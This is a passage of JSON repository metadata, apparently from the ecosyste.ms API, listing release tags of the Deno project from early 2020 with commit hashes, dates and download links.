"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/deno